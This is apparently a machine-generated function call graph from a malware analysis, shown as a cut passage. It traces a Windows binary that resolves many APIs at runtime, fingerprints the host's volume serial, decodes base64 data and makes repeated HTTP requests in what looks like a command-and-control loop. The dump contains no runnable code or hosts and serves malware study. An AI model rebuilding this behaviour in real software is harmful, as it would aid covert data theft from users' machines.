13632->13633 13634 612d58 13633->13634 13635 6145c0 2 API calls 13634->13635 13636 612d71 13635->13636 13637 6145c0 2 API calls 13636->13637 13638 612d8a 13637->13638 13639 6145c0 2 API calls 13638->13639 13640 612da3 13639->13640 13641 6145c0 2 API calls 13640->13641 13642 612dbc 13641->13642 13643 6145c0 2 API calls 13642->13643 13644 612dd5 13643->13644 13645 6145c0 2 API calls 13644->13645 13646 612dee 13645->13646 13647 6145c0 2 API calls 13646->13647 13648 612e07 13647->13648 13649 6145c0 2 API calls 13648->13649 13650 612e20 13649->13650 13651 6145c0 2 API calls 13650->13651 13652 612e39 13651->13652 13653 6145c0 2 API calls 13652->13653 13654 612e52 13653->13654 13655 6145c0 2 API calls 13654->13655 13656 612e6b 13655->13656 13657 6145c0 2 API calls 13656->13657 13658 612e84 13657->13658 13659 6145c0 2 API calls 13658->13659 13660 612e9d 13659->13660 13661 6145c0 2 API calls 13660->13661 13662 612eb6 13661->13662 13663 6145c0 2 API calls 13662->13663 13664 612ecf 13663->13664 13665 6145c0 2 API calls 13664->13665 13666 612ee8 13665->13666 13667 6145c0 2 API calls 13666->13667 13668 612f01 13667->13668 13669 6145c0 2 API calls 13668->13669 13670 612f1a 13669->13670 13671 6145c0 2 API calls 13670->13671 13672 612f33 13671->13672 13673 6145c0 2 API calls 13672->13673 13674 612f4c 13673->13674 13675 6145c0 2 API calls 13674->13675 13676 612f65 13675->13676 13677 6145c0 2 API calls 13676->13677 13678 612f7e 13677->13678 13679 6145c0 2 API calls 13678->13679 13680 612f97 13679->13680 13681 6145c0 2 API calls 13680->13681 13682 612fb0 13681->13682 13683 6145c0 2 API calls 13682->13683 13684 612fc9 13683->13684 13685 6145c0 2 API calls 13684->13685 13686 612fe2 13685->13686 13687 6145c0 2 API calls 13686->13687 13688 612ffb 13687->13688 13689 6145c0 2 API calls 13688->13689 13690 613014 13689->13690 13691 6145c0 2 API calls 13690->13691 13692 61302d 13691->13692 13693 6145c0 2 API calls 13692->13693 13694 613046 13693->13694 13695 6145c0 2 API calls 13694->13695 13696 61305f 13695->13696 13697 6145c0 2 API calls 13696->13697 13698 613078 13697->13698 13699 6145c0 2 API calls 13698->13699 13700 613091 13699->13700 13701 6145c0 2 API calls 13700->13701 13702 6130aa 13701->13702 13703 6145c0 2 API calls 13702->13703 13704 6130c3 13703->13704 13705 6145c0 2 API calls 13704->13705 13706 6130dc 13705->13706 13707 6145c0 2 API calls 13706->13707 13708 6130f5 13707->13708 13709 6145c0 2 API calls 13708->13709 13710 61310e 13709->13710 13711 6145c0 2 API calls 13710->13711 13712 613127 13711->13712 13713 6145c0 2 API calls 13712->13713 13714 613140 13713->13714 13715 6145c0 2 API calls 13714->13715 13716 613159 13715->13716 13717 6145c0 2 API calls 13716->13717 13718 613172 13717->13718 13719 6145c0 2 API calls 13718->13719 13720 61318b 13719->13720 13721 6145c0 2 API calls 13720->13721 13722 6131a4 13721->13722 13723 6145c0 2 API calls 13722->13723 13724 6131bd 13723->13724 13725 6145c0 2 API calls 13724->13725 13726 6131d6 13725->13726 13727 6145c0 2 API calls 13726->13727 13728 6131ef 13727->13728 13729 6145c0 2 API calls 13728->13729 13730 613208 13729->13730 13731 6145c0 2 API calls 13730->13731 13732 613221 13731->13732 13733 6145c0 2 API calls 13732->13733 13734 61323a 13733->13734 13735 6145c0 2 API calls 13734->13735 13736 613253 13735->13736 13737 6145c0 2 API calls 13736->13737 13738 61326c 13737->13738 13739 6145c0 2 API calls 13738->13739 13740 613285 13739->13740 13741 6145c0 2 API calls 13740->13741 13742 61329e 13741->13742 13743 6145c0 2 API calls 13742->13743 13744 6132b7 13743->13744 13745 6145c0 2 API calls 13744->13745 13746 6132d0 13745->13746 13747 6145c0 2 API calls 13746->13747 13748 6132e9 13747->13748 13749 6145c0 2 API calls 13748->13749 13750 613302 13749->13750 13751 6145c0 2 API calls 13750->13751 13752 61331b 13751->13752 13753 6145c0 2 API calls 13752->13753 13754 613334 13753->13754 13755 6145c0 2 API calls 13754->13755 13756 61334d 13755->13756 13757 6145c0 2 API calls 13756->13757 13758 613366 13757->13758 13759 6145c0 2 API calls 13758->13759 13760 61337f 13759->13760 13761 6145c0 2 API calls 13760->13761 13762 613398 13761->13762 13763 6145c0 2 API calls 13762->13763 13764 6133b1 13763->13764 13765 6145c0 2 API calls 13764->13765 13766 6133ca 13765->13766 13767 6145c0 2 API calls 13766->13767 13768 6133e3 13767->13768 13769 6145c0 2 API calls 13768->13769 13770 6133fc 13769->13770 13771 6145c0 2 API calls 13770->13771 13772 613415 13771->13772 13773 6145c0 2 API calls 13772->13773 13774 61342e 13773->13774 13775 6145c0 2 API calls 13774->13775 13776 613447 13775->13776 13777 6145c0 2 API calls 13776->13777 13778 613460 13777->13778 13779 6145c0 2 API calls 13778->13779 13780 613479 13779->13780 13781 6145c0 2 API calls 13780->13781 13782 613492 13781->13782 13783 6145c0 2 API calls 13782->13783 13784 6134ab 13783->13784 13785 6145c0 2 API calls 13784->13785 13786 6134c4 13785->13786 13787 6145c0 2 API calls 13786->13787 13788 6134dd 13787->13788 13789 6145c0 2 API calls 13788->13789 13790 6134f6 13789->13790 13791 6145c0 2 API calls 13790->13791 13792 61350f 13791->13792 13793 6145c0 2 API calls 13792->13793 13794 613528 13793->13794 13795 6145c0 2 API calls 13794->13795 13796 613541 13795->13796 13797 6145c0 2 API calls 13796->13797 13798 61355a 13797->13798 13799 6145c0 2 API calls 13798->13799 13800 613573 13799->13800 13801 6145c0 2 API calls 13800->13801 13802 61358c 13801->13802 13803 6145c0 2 API calls 13802->13803 13804 6135a5 13803->13804 13805 6145c0 2 API calls 13804->13805 13806 6135be 13805->13806 13807 6145c0 2 API calls 13806->13807 13808 6135d7 13807->13808 13809 6145c0 2 API calls 13808->13809 13810 6135f0 13809->13810 13811 6145c0 2 API calls 13810->13811 13812 613609 13811->13812 13813 6145c0 2 API calls 13812->13813 13814 613622 13813->13814 13815 6145c0 2 API calls 13814->13815 13816 61363b 13815->13816 13817 6145c0 2 API calls 13816->13817 13818 613654 13817->13818 13819 6145c0 2 API calls 13818->13819 13820 61366d 13819->13820 13821 6145c0 2 API calls 13820->13821 13822 613686 13821->13822 13823 6145c0 2 API calls 13822->13823 13824 61369f 13823->13824 13825 6145c0 2 API calls 13824->13825 13826 6136b8 13825->13826 13827 6145c0 2 API calls 13826->13827 13828 6136d1 13827->13828 13829 6145c0 2 API calls 13828->13829 13830 6136ea 13829->13830 13831 6145c0 2 API calls 13830->13831 13832 613703 13831->13832 13833 6145c0 2 API calls 13832->13833 13834 61371c 13833->13834 13835 6145c0 2 API calls 13834->13835 13836 613735 13835->13836 13837 6145c0 2 API calls 13836->13837 13838 61374e 13837->13838 13839 6145c0 2 API calls 13838->13839 13840 613767 13839->13840 13841 6145c0 2 API calls 13840->13841 13842 613780 13841->13842 13843 6145c0 2 API calls 13842->13843 13844 613799 13843->13844 13845 6145c0 2 API calls 13844->13845 13846 6137b2 13845->13846 13847 6145c0 2 API calls 13846->13847 13848 6137cb 13847->13848 13849 6145c0 2 API calls 13848->13849 13850 6137e4 13849->13850 13851 6145c0 2 API calls 13850->13851 13852 6137fd 13851->13852 13853 6145c0 2 API calls 13852->13853 13854 613816 13853->13854 13855 6145c0 2 API calls 13854->13855 13856 61382f 13855->13856 13857 6145c0 2 API calls 13856->13857 13858 613848 13857->13858 13859 6145c0 2 API calls 13858->13859 13860 613861 13859->13860 13861 6145c0 2 API calls 13860->13861 13862 61387a 13861->13862 13863 6145c0 2 API calls 13862->13863 13864 613893 13863->13864 13865 6145c0 2 API calls 13864->13865 13866 6138ac 13865->13866 13867 6145c0 2 API calls 13866->13867 13868 6138c5 13867->13868 13869 6145c0 2 API calls 13868->13869 13870 6138de 13869->13870 13871 6145c0 2 API calls 13870->13871 13872 6138f7 13871->13872 13873 6145c0 2 API calls 13872->13873 13874 613910 13873->13874 13875 6145c0 2 API calls 13874->13875 13876 613929 13875->13876 13877 6145c0 2 API calls 13876->13877 13878 613942 13877->13878 13879 6145c0 2 API calls 13878->13879 13880 61395b 13879->13880 13881 6145c0 2 API calls 13880->13881 13882 613974 13881->13882 13883 6145c0 2 API calls 13882->13883 13884 61398d 13883->13884 13885 6145c0 2 API calls 13884->13885 13886 6139a6 13885->13886 13887 6145c0 2 API calls 13886->13887 13888 6139bf 13887->13888 13889 6145c0 2 API calls 13888->13889 13890 6139d8 13889->13890 13891 6145c0 2 API calls 13890->13891 13892 6139f1 13891->13892 13893 6145c0 2 API calls 13892->13893 13894 613a0a 13893->13894 13895 6145c0 2 API calls 13894->13895 13896 613a23 13895->13896 13897 6145c0 2 API calls 13896->13897 13898 613a3c 13897->13898 13899 6145c0 2 API calls 13898->13899 13900 613a55 13899->13900 13901 6145c0 2 API calls 13900->13901 13902 613a6e 13901->13902 13903 6145c0 2 API calls 13902->13903 13904 613a87 13903->13904 13905 6145c0 2 API calls 13904->13905 13906 613aa0 13905->13906 13907 6145c0 2 API calls 13906->13907 13908 613ab9 13907->13908 13909 6145c0 2 API calls 13908->13909 13910 613ad2 13909->13910 13911 6145c0 2 API calls 13910->13911 13912 613aeb 13911->13912 13913 6145c0 2 API calls 13912->13913 13914 613b04 13913->13914 13915 6145c0 2 API calls 13914->13915 13916 613b1d 13915->13916 13917 6145c0 2 API calls 13916->13917 13918 613b36 13917->13918 13919 6145c0 2 API calls 13918->13919 13920 613b4f 13919->13920 13921 6145c0 2 API calls 13920->13921 13922 613b68 13921->13922 13923 6145c0 2 API calls 13922->13923 13924 613b81 13923->13924 13925 6145c0 2 API calls 13924->13925 13926 613b9a 13925->13926 13927 6145c0 2 API calls 13926->13927 13928 613bb3 13927->13928 13929 6145c0 2 API calls 13928->13929 13930 613bcc 13929->13930 13931 6145c0 2 API calls 13930->13931 13932 613be5 13931->13932 13933 6145c0 2 API calls 13932->13933 13934 613bfe 13933->13934 13935 6145c0 2 API calls 13934->13935 13936 613c17 13935->13936 13937 6145c0 2 API calls 13936->13937 13938 613c30 13937->13938 13939 6145c0 2 API calls 13938->13939 13940 613c49 13939->13940 13941 6145c0 2 API calls 13940->13941 13942 613c62 13941->13942 13943 6145c0 2 API calls 13942->13943 13944 613c7b 13943->13944 13945 6145c0 2 API calls 13944->13945 13946 613c94 13945->13946 13947 6145c0 2 API calls 13946->13947 13948 613cad 13947->13948 13949 6145c0 2 API calls 13948->13949 13950 613cc6 13949->13950 13951 6145c0 2 API calls 13950->13951 13952 613cdf 13951->13952 13953 6145c0 2 API calls 13952->13953 13954 613cf8 13953->13954 13955 6145c0 2 API calls 13954->13955 13956 613d11 13955->13956 13957 6145c0 2 API calls 13956->13957 13958 613d2a 13957->13958 13959 6145c0 2 API calls 13958->13959 13960 613d43 13959->13960 13961 6145c0 2 API calls 13960->13961 13962 613d5c 13961->13962 13963 6145c0 2 API calls 13962->13963 13964 613d75 13963->13964 13965 6145c0 2 API calls 13964->13965 13966 613d8e 13965->13966 13967 6145c0 2 API calls 13966->13967 13968 613da7 13967->13968 13969 6145c0 2 API calls 13968->13969 13970 613dc0 13969->13970 13971 6145c0 2 API calls 13970->13971 13972 613dd9 13971->13972 13973 6145c0 2 API calls 13972->13973 13974 613df2 13973->13974 13975 6145c0 2 API calls 13974->13975 13976 613e0b 13975->13976 13977 6145c0 2 API calls 13976->13977 13978 613e24 13977->13978 13979 6145c0 2 API calls 13978->13979 13980 613e3d 13979->13980 13981 6145c0 2 API calls 13980->13981 13982 613e56 13981->13982 13983 6145c0 2 API calls 13982->13983 13984 613e6f 13983->13984 13985 6145c0 2 API calls 13984->13985 13986 613e88 13985->13986 13987 6145c0 2 API calls 13986->13987 13988 613ea1 13987->13988 13989 6145c0 2 API calls 13988->13989 13990 613eba 13989->13990 13991 6145c0 2 API calls 13990->13991 13992 613ed3 13991->13992 13993 6145c0 2 API calls 13992->13993 13994 613eec 13993->13994 13995 6145c0 2 API calls 13994->13995 13996 613f05 13995->13996 13997 6145c0 2 API calls 13996->13997 13998 613f1e 13997->13998 13999 6145c0 2 API calls 13998->13999 14000 613f37 13999->14000 14001 6145c0 2 API calls 14000->14001 14002 613f50 14001->14002 14003 6145c0 2 API calls 14002->14003 14004 613f69 14003->14004 14005 6145c0 2 API calls 14004->14005 14006 613f82 14005->14006 14007 6145c0 2 API calls 14006->14007 14008 613f9b 14007->14008 14009 6145c0 2 API calls 14008->14009 14010 613fb4 14009->14010 14011 6145c0 2 API calls 14010->14011 14012 613fcd 14011->14012 14013 6145c0 2 API calls 14012->14013 14014 613fe6 14013->14014 14015 6145c0 2 API calls 14014->14015 14016 613fff 14015->14016 14017 6145c0 2 API calls 14016->14017 14018 614018 14017->14018 14019 6145c0 2 API calls 14018->14019 14020 614031 14019->14020 14021 6145c0 2 API calls 14020->14021 14022 61404a 14021->14022 14023 6145c0 2 API calls 14022->14023 14024 614063 14023->14024 14025 6145c0 2 API calls 14024->14025 14026 61407c 14025->14026 14027 6145c0 2 API calls 14026->14027 14028 614095 14027->14028 14029 6145c0 2 API calls 14028->14029 14030 6140ae 14029->14030 14031 6145c0 2 API calls 14030->14031 14032 6140c7 14031->14032 14033 6145c0 2 API calls 14032->14033 14034 6140e0 14033->14034 14035 6145c0 2 API calls 14034->14035 14036 6140f9 14035->14036 14037 6145c0 2 API calls 14036->14037 14038 614112 14037->14038 14039 6145c0 2 API calls 14038->14039 14040 61412b 14039->14040 14041 6145c0 2 API calls 14040->14041 14042 614144 14041->14042 14043 6145c0 2 API calls 14042->14043 14044 61415d 14043->14044 14045 6145c0 2 API calls 14044->14045 14046 614176 14045->14046 14047 6145c0 2 API calls 14046->14047 14048 61418f 14047->14048 14049 6145c0 2 API calls 14048->14049 14050 6141a8 14049->14050 14051 6145c0 2 API calls 14050->14051 14052 6141c1 14051->14052 14053 6145c0 2 API calls 14052->14053 14054 6141da 14053->14054 14055 6145c0 2 API calls 14054->14055 14056 6141f3 14055->14056 14057 6145c0 2 API calls 14056->14057 14058 61420c 14057->14058 14059 6145c0 2 API calls 14058->14059 14060 614225 14059->14060 14061 6145c0 2 API calls 14060->14061 14062 61423e 14061->14062 14063 6145c0 2 API calls 14062->14063 14064 614257 14063->14064 14065 6145c0 2 API calls 14064->14065 14066 614270 14065->14066 14067 6145c0 2 API calls 14066->14067 14068 614289 14067->14068 14069 6145c0 2 API calls 14068->14069 14070 6142a2 14069->14070 14071 6145c0 2 API calls 14070->14071 14072 6142bb 14071->14072 14073 6145c0 2 API calls 14072->14073 14074 6142d4 14073->14074 14075 6145c0 2 API calls 14074->14075 14076 6142ed 14075->14076 14077 6145c0 2 API calls 14076->14077 14078 614306 14077->14078 14079 6145c0 2 API calls 14078->14079 14080 61431f 14079->14080 14081 6145c0 2 API calls 14080->14081 14082 614338 14081->14082 14083 6145c0 2 API calls 14082->14083 14084 614351 14083->14084 14085 6145c0 2 API calls 14084->14085 14086 61436a 14085->14086 14087 6145c0 2 API calls 14086->14087 14088 614383 14087->14088 14089 6145c0 2 API calls 14088->14089 14090 61439c 14089->14090 14091 6145c0 2 API calls 14090->14091 14092 6143b5 14091->14092 14093 6145c0 2 API calls 14092->14093 14094 6143ce 14093->14094 14095 6145c0 2 API calls 14094->14095 14096 6143e7 14095->14096 14097 6145c0 2 API calls 14096->14097 14098 614400 14097->14098 14099 6145c0 2 API calls 14098->14099 14100 614419 14099->14100 14101 6145c0 2 API calls 14100->14101 14102 614432 14101->14102 14103 6145c0 2 API calls 14102->14103 14104 61444b 14103->14104 14105 6145c0 2 API calls 14104->14105 14106 614464 14105->14106 14107 6145c0 2 API calls 14106->14107 14108 61447d 14107->14108 14109 6145c0 2 API calls 14108->14109 14110 614496 14109->14110 14111 6145c0 2 API calls 14110->14111 14112 6144af 14111->14112 14113 6145c0 2 API calls 14112->14113 14114 6144c8 14113->14114 14115 6145c0 2 API calls 14114->14115 14116 6144e1 14115->14116 14117 6145c0 2 API calls 14116->14117 14118 6144fa 14117->14118 14119 6145c0 2 API calls 14118->14119 14120 614513 14119->14120 14121 6145c0 2 API calls 14120->14121 14122 61452c 14121->14122 14123 6145c0 2 API calls 14122->14123 14124 614545 14123->14124 14125 6145c0 2 API calls 14124->14125 14126 61455e 14125->14126 14127 6145c0 2 API calls 14126->14127 14128 614577 14127->14128 14129 6145c0 2 API calls 14128->14129 14130 614590 14129->14130 14131 6145c0 2 API calls 14130->14131 14132 6145a9 14131->14132 14133 629c10 14132->14133 14134 629c20 43 API calls 14133->14134 14135 62a036 8 API calls 14133->14135 14134->14135 14136 62a146 14135->14136 14137 62a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14135->14137 14138 62a153 8 API calls 14136->14138 14139 62a216 14136->14139 14137->14136 14138->14139 14140 62a298 14139->14140 14141 62a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14139->14141 14142 62a337 14140->14142 14143 62a2a5 6 API calls 14140->14143 14141->14140 14144 62a344 9 API calls 14142->14144 14145 62a41f 14142->14145 14143->14142 14144->14145 14146 62a4a2 14145->14146 14147 62a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14145->14147 14148 62a4ab GetProcAddress GetProcAddress 14146->14148 14149 62a4dc 14146->14149 14147->14146 14148->14149 14150 62a515 14149->14150 14151 62a4e5 GetProcAddress GetProcAddress 14149->14151 14152 62a612 14150->14152 14153 62a522 10 API calls 14150->14153 14151->14150 14154 62a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14152->14154 14155 62a67d 14152->14155 14153->14152 14154->14155 14156 62a686 GetProcAddress 14155->14156 14157 62a69e 14155->14157 14156->14157 14158 62a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14157->14158 14159 625ca3 14157->14159 14158->14159 14160 611590 14159->14160 15279 611670 14160->15279 14163 62a7a0 lstrcpy 14164 6115b5 14163->14164 14165 62a7a0 lstrcpy 14164->14165 14166 6115c7 14165->14166 14167 62a7a0 lstrcpy 14166->14167 14168 6115d9 14167->14168 14169 62a7a0 lstrcpy 14168->14169 14170 611663 14169->14170 14171 625510 14170->14171 14172 625521 14171->14172 14173 62a820 2 API calls 14172->14173 14174 62552e 14173->14174 14175 62a820 2 API calls 14174->14175 14176 62553b 14175->14176 14177 62a820 2 API calls 14176->14177 14178 625548 14177->14178 14179 62a740 lstrcpy 14178->14179 14180 625555 14179->14180 14181 62a740 lstrcpy 14180->14181 14182 625562 14181->14182 14183 62a740 lstrcpy 14182->14183 14184 62556f 14183->14184 14185 62a740 lstrcpy 14184->14185 14188 62557c 14185->14188 14186 62a7a0 lstrcpy 14186->14188 14187 625643 StrCmpCA 14187->14188 14188->14186 14188->14187 14189 6256a0 StrCmpCA 14188->14189 14193 62a820 lstrlen lstrcpy 14188->14193 14195 625856 StrCmpCA 14188->14195 14198 62a740 lstrcpy 14188->14198 14203 611590 lstrcpy 14188->14203 14206 625a0b StrCmpCA 14188->14206 14207 6252c0 25 API calls 14188->14207 14214 62a8a0 lstrcpy 14188->14214 14221 62578a StrCmpCA 14188->14221 14223 62593f StrCmpCA 14188->14223 14224 6251f0 20 API calls 14188->14224 14189->14188 14190 6257dc 14189->14190 14191 62a8a0 lstrcpy 14190->14191 14192 6257e8 14191->14192 14194 62a820 2 API calls 14192->14194 14193->14188 14196 6257f6 14194->14196 14195->14188 14197 625991 14195->14197 14199 62a820 2 API calls 14196->14199 14201 62a8a0 lstrcpy 14197->14201 14198->14188 14200 625805 14199->14200 14202 611670 lstrcpy 14200->14202 14204 62599d 14201->14204 14225 625811 14202->14225 14203->14188 14205 62a820 2 API calls 14204->14205 14208 6259ab 14205->14208 14210 625a16 Sleep 14206->14210 14211 625a28 14206->14211 14207->14188 14209 62a820 2 API calls 14208->14209 14212 6259ba 14209->14212 14210->14188 14213 62a8a0 lstrcpy 14211->14213 14215 611670 lstrcpy 14212->14215 14216 625a34 14213->14216 14214->14188 14215->14225 14217 62a820 2 API calls 14216->14217 14218 625a43 14217->14218 14219 62a820 2 API calls 14218->14219 14220 625a52 14219->14220 14222 611670 lstrcpy 14220->14222 14221->14188 14222->14225 14223->14188 14224->14188 14225->13278 14227 627553 GetVolumeInformationA 14226->14227 14228 62754c 14226->14228 14229 627591 14227->14229 14228->14227 14230 6275fc GetProcessHeap RtlAllocateHeap 14229->14230 14231 627628 wsprintfA 14230->14231 14232 627619 14230->14232 14234 62a740 lstrcpy 14231->14234 14233 62a740 lstrcpy 14232->14233 14235 625da7 14233->14235 14234->14235 14235->13299 14237 62a7a0 lstrcpy 14236->14237 14238 614899 14237->14238 15288 6147b0 14238->15288 14240 6148a5 14241 62a740 lstrcpy 14240->14241 14242 6148d7 14241->14242 14243 62a740 lstrcpy 14242->14243 14244 6148e4 14243->14244 14245 62a740 lstrcpy 14244->14245 14246 6148f1 14245->14246 14247 62a740 lstrcpy 14246->14247 14248 6148fe 14247->14248 14249 62a740 lstrcpy 14248->14249 14250 61490b InternetOpenA StrCmpCA 14249->14250 14251 614944 14250->14251 14252 614ecb InternetCloseHandle 14251->14252 15294 628b60 14251->15294 14254 614ee8 14252->14254 15309 619ac0 CryptStringToBinaryA 14254->15309 14255 614963 15302 62a920 14255->15302 14258 614976 14260 62a8a0 lstrcpy 14258->14260 14265 61497f 14260->14265 14261 62a820 2 API calls 14262 614f05 14261->14262 14264 62a9b0 4 API calls 14262->14264 14263 614f27 codecvt 14267 62a7a0 lstrcpy 14263->14267 14266 614f1b 14264->14266 14270 62a9b0 4 API calls 14265->14270 14268 62a8a0 lstrcpy 14266->14268 14269 614f57 14267->14269 14268->14263 14269->13302 14271 6149a9 14270->14271 14272 62a8a0 lstrcpy 14271->14272 14273 6149b2 14272->14273 14274 62a9b0 4 API calls 14273->14274 14275 6149d1 14274->14275 14276 62a8a0 lstrcpy 14275->14276 14277 6149da 14276->14277 14278 62a920 3 API calls 14277->14278 14279 6149f8 14278->14279 14280 62a8a0 lstrcpy 14279->14280 14281 614a01 14280->14281 14282 62a9b0 4 API calls 14281->14282 14283 614a20 14282->14283 14284 62a8a0 lstrcpy 14283->14284 14285 614a29 14284->14285 14286 62a9b0 4 API calls 14285->14286 14287 614a48 14286->14287 14288 62a8a0 lstrcpy 14287->14288 14289 614a51 14288->14289 14290 62a9b0 4 API calls 14289->14290 14291 614a7d 14290->14291 14292 62a920 3 API calls 14291->14292 14293 614a84 14292->14293 14294 62a8a0 lstrcpy 14293->14294 14295 614a8d 14294->14295 14296 614aa3 InternetConnectA 14295->14296 14296->14252 14297 614ad3 HttpOpenRequestA 14296->14297 14299 614b28 14297->14299 14300 614ebe InternetCloseHandle 14297->14300 14301 62a9b0 4 API calls 14299->14301 14300->14252 14302 614b3c 14301->14302 14303 62a8a0 lstrcpy 14302->14303 14304 614b45 14303->14304 14305 62a920 3 API calls 14304->14305 14306 614b63 14305->14306 14307 62a8a0 lstrcpy 14306->14307 14308 614b6c 14307->14308 14309 62a9b0 4 API calls 14308->14309 14310 614b8b 14309->14310 14311 62a8a0 lstrcpy 14310->14311 14312 614b94 14311->14312 14313 62a9b0 4 API calls 14312->14313 14314 614bb5 14313->14314 14315 62a8a0 lstrcpy 14314->14315 14316 614bbe 14315->14316 14317 62a9b0 4 API calls 14316->14317 14318 614bde 14317->14318 14319 62a8a0 lstrcpy 14318->14319 14320 614be7 14319->14320 14321 62a9b0 4 API calls 14320->14321 14322 614c06 14321->14322 14323 62a8a0 lstrcpy 14322->14323 14324 614c0f 14323->14324 14325 62a920 3 API calls 14324->14325 14326 614c2d 14325->14326 14327 62a8a0 lstrcpy 14326->14327 14328 614c36 14327->14328 14329 62a9b0 4 API calls 14328->14329 14330 614c55 14329->14330 14331 62a8a0 lstrcpy 14330->14331 14332 614c5e 14331->14332 14333 62a9b0 4 API calls 14332->14333 14334 614c7d 14333->14334 14335 62a8a0 lstrcpy 14334->14335 14336 614c86 14335->14336 14337 62a920 3 API calls 14336->14337 14338 614ca4 14337->14338 14339 62a8a0 lstrcpy 14338->14339 14340 614cad 14339->14340 14341 62a9b0 4 API calls 14340->14341 14342 614ccc 14341->14342 14343 62a8a0 lstrcpy 14342->14343 14344 614cd5 14343->14344 14345 62a9b0 4 API calls 14344->14345 14346 614cf6 14345->14346 14347 62a8a0 lstrcpy 14346->14347 14348 614cff 14347->14348 14349 62a9b0 4 API calls 14348->14349 14350 614d1f 14349->14350 14351 62a8a0 lstrcpy 14350->14351 14352 614d28 14351->14352 14353 62a9b0 4 API calls 14352->14353 14354 614d47 14353->14354 14355 62a8a0 lstrcpy 14354->14355 14356 614d50 14355->14356 14357 62a920 3 API calls 14356->14357 14358 614d6e 14357->14358 14359 62a8a0 lstrcpy 14358->14359 14360 614d77 14359->14360 14361 62a740 lstrcpy 14360->14361 14362 614d92 14361->14362 14363 62a920 3 API calls 14362->14363 14364 614db3 14363->14364 14365 62a920 3 API calls 14364->14365 14366 614dba 14365->14366 14367 62a8a0 lstrcpy 14366->14367 14368 614dc6 14367->14368 14369 614de7 lstrlen 14368->14369 14370 614dfa 14369->14370 14371 614e03 lstrlen 14370->14371 15308 62aad0 14371->15308 14373 614e13 HttpSendRequestA 14374 614e32 InternetReadFile 14373->14374 14375 614e67 InternetCloseHandle 14374->14375 14380 614e5e 14374->14380 14377 62a800 14375->14377 14377->14300 14378 62a9b0 4 API calls 14378->14380 14379 62a8a0 lstrcpy 14379->14380 14380->14374 14380->14375 14380->14378 14380->14379 15315 62aad0 14381->15315 14383 6217c4 StrCmpCA 14384 6217cf ExitProcess 14383->14384 14396 6217d7 14383->14396 14385 6219c2 14385->13304 14386 6218cf StrCmpCA 14386->14396 14387 6218ad StrCmpCA 14387->14396 14388 621932 StrCmpCA 14388->14396 14389 621913 StrCmpCA 14389->14396 14390 621970 StrCmpCA 14390->14396 14391 6218f1 StrCmpCA 14391->14396 14392 621951 StrCmpCA 14392->14396 14393 62187f StrCmpCA 14393->14396 14394 62185d StrCmpCA 14394->14396 14395 62a820 lstrlen lstrcpy 14395->14396 14396->14385 14396->14386 14396->14387 14396->14388 14396->14389 14396->14390 14396->14391 14396->14392 14396->14393 14396->14394 14396->14395 14398 62a7a0 lstrcpy 14397->14398 14399 615979 14398->14399 14400 6147b0 2 API calls 14399->14400 14401 615985 14400->14401 14402 62a740 lstrcpy 14401->14402 14403 6159ba 14402->14403 14404 62a740 lstrcpy 14403->14404 14405 6159c7 14404->14405 14406 62a740 lstrcpy 14405->14406 14407 6159d4 14406->14407 14408 62a740 lstrcpy 14407->14408 14409 6159e1 14408->14409 14410 62a740 lstrcpy 14409->14410 14411 6159ee InternetOpenA StrCmpCA 14410->14411 14412 615a1d 14411->14412 14413 615fc3 InternetCloseHandle 14412->14413 14415 628b60 3 API calls 14412->14415 14414 615fe0 14413->14414 14417 619ac0 4 API calls 14414->14417 14416 615a3c 14415->14416 14418 62a920 3 API calls 14416->14418 14419 615fe6 14417->14419 14420 615a4f 14418->14420 14422 62a820 2 API calls 14419->14422 14425 61601f codecvt 14419->14425 14421 62a8a0 lstrcpy 14420->14421 14426 615a58 14421->14426 14423 615ffd 14422->14423 14424 62a9b0 4 API calls 14423->14424 14427 616013 14424->14427 14428 62a7a0 lstrcpy 14425->14428 14430 62a9b0 4 API calls 14426->14430 14429 62a8a0 lstrcpy 14427->14429 14434 61604f 14428->14434 14429->14425 14431 615a82 14430->14431 14432 62a8a0 lstrcpy 14431->14432 14433 615a8b 14432->14433 14435 62a9b0 4 API calls 14433->14435 14434->13310 14436 615aaa 14435->14436 14437 62a8a0 lstrcpy 14436->14437 14438 615ab3 14437->14438 14439 62a920 3 API calls 14438->14439 14440 615ad1 14439->14440 14441 62a8a0 lstrcpy 14440->14441 14442 615ada 14441->14442 14443 62a9b0 4 API calls 14442->14443 14444 615af9 14443->14444 14445 62a8a0 lstrcpy 14444->14445 14446 615b02 14445->14446 14447 62a9b0 4 API calls 14446->14447 14448 615b21 14447->14448 14449 62a8a0 lstrcpy 14448->14449 14450 615b2a 14449->14450 14451 62a9b0 4 API calls 14450->14451 14452 615b56 14451->14452 14453 62a920 3 API calls 14452->14453 14454 615b5d 14453->14454 14455 62a8a0 lstrcpy 14454->14455 14456 615b66 14455->14456 14457 615b7c InternetConnectA 14456->14457 14457->14413 14458 615bac HttpOpenRequestA 14457->14458 14460 615fb6 InternetCloseHandle 14458->14460 14461 615c0b 14458->14461 14460->14413 14462 62a9b0 4 API calls 14461->14462 14463 615c1f 14462->14463 14464 62a8a0 lstrcpy 14463->14464 14465 615c28 14464->14465 14466 62a920 3 API calls 14465->14466 14467 615c46 14466->14467 14468 62a8a0 lstrcpy 14467->14468 14469 615c4f 14468->14469 14470 62a9b0 4 API calls 14469->14470 14471 615c6e 14470->14471 14472 62a8a0 lstrcpy 14471->14472 14473 615c77 14472->14473 14474 62a9b0 4 API calls 14473->14474 14475 615c98 14474->14475 14476 62a8a0 lstrcpy 14475->14476 14477 615ca1 14476->14477 14478 62a9b0 4 API calls 14477->14478 14479 615cc1 14478->14479 14480 62a8a0 lstrcpy 14479->14480 14481 615cca 14480->14481 14482 62a9b0 4 API calls 14481->14482 14483 615ce9 14482->14483 14484 62a8a0 lstrcpy 14483->14484 14485 615cf2 14484->14485 14486 62a920 3 API calls 14485->14486 14487 615d10 14486->14487 14488 62a8a0 lstrcpy 14487->14488 14489 615d19 14488->14489 14490 62a9b0 4 API calls 14489->14490 14491 615d38 14490->14491 14492 62a8a0 lstrcpy 14491->14492 14493 615d41 14492->14493 14494 62a9b0 4 API calls 14493->14494 14495 615d60 14494->14495 14496 62a8a0 lstrcpy 14495->14496 14497 615d69 14496->14497 14498 62a920 3 API calls 14497->14498 14499 615d87 14498->14499 14500 62a8a0 lstrcpy 14499->14500 14501 615d90 14500->14501 14502 